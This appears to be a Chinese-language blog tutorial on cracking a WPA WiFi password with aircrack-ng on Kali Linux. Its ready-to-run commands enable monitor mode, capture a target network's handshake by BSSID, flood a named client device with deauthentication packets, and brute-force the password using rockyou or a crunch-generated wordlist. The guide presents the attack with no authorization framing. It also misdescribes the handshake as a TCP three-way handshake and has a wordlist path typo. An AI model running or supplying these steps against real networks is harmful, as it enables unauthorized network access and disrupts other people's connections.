查看本机网卡名称
1
ifconfig
eth0
有线网卡wlan0
无线网卡
虚拟机无法访问网卡,所以需要使用外接的USB无线网卡。
查看是否支持监听模式
1
airmon-ng
如果该命令没有任何输出则表示没有可以支持监听模式的网卡。
开启无线网卡的监听模式
1
airmon-ng start wlan0
如果airmon-ng
显示的是wifi0,就把wlan0改为wifi0,这时候再输入ifconfig
,会发现wlan0变为了wlan0mon,这表明网卡监听模式已开启。
搜索附近的WiFi
1
airodump-ng wlan0mon
使用airodump-ng
命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等,BSSID为MAC地址,PWR为信号强度(越小信号越强),CH为信道,#DATA为数据量,越大使用的人就越多。这里我们记下要破解WiFi的BSSID和信道。当搜索到我们想要破解的WiFi热点时可以Ctrl+C
停止搜索。
抓取握手包
使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。
1
airodump-ng -c 10 --bssid D4:EE:07:12:57:80 -w ~/ wlan0mon
-c
指定信道-bssid
指定目标路由器的BSSID-w
指定抓取数据包保存的目录
强制连接到wifi的设备重连路由器
现在我们使用aireplay-ng
命令给连接到wifi的设备发送一个反认证包,使设备强制断开连接,随后它会自动再次连接wifi,这个自动连接过程会进行三次握手,会发送TCP包(里面包含加密的密码数据)。不难看出,airplay-ng
生效的前提是WiFi热点中必须至少已经接入一个设备。由于刚刚打开的终端一直在执行抓包工作,所以我们重新打开一个终端,输入命令。
1
aireplay-ng -0 5 -a D4:EE:07:12:57:80 -c AC:CF:85:B6:81 wlan0mon
-a
指定目标路由器的BSSID-c
指定要攻击设备的MAC地址-0
为用deauth洪水攻击WiFi设备的次数,-0 0
为无限,-0 5
则攻击5次
结束无线网卡的监听模式
此时返回前一个终端,当窗口右上角出现WPA handshake时说明抓包成功,这个时候使用Ctrl+C
命令停止抓包,同时结束无线网卡的监听模式。
1
airmon-ng stop wlan0mon
解压字典文件
Kali本身就有字典文件,我们把它解压出来。
1
gzip -d /usr/share/wordlists/rockyou.txt.gz
暴力破解
上面已经成功抓取到了握手包,现在要做的工作就是将握手包的密码和字典文件中的密码进行匹配。
1
aircrack-ng -w /usr/share/wordlist/rockyou.txt ~/*.cap
-w
字典路径 握手包路径
生成字典文件
如果Kali自带的字典文件不够用,可以通过crunch自己制作字典。
1
crunch 10 10 012 xy > /root/12345.txt
10 10
表示制作一个10位数的密码012 xy
表示密码中包含数字012、xy这些元素/root/12345.txt
表示密码文本储存的路径以及名字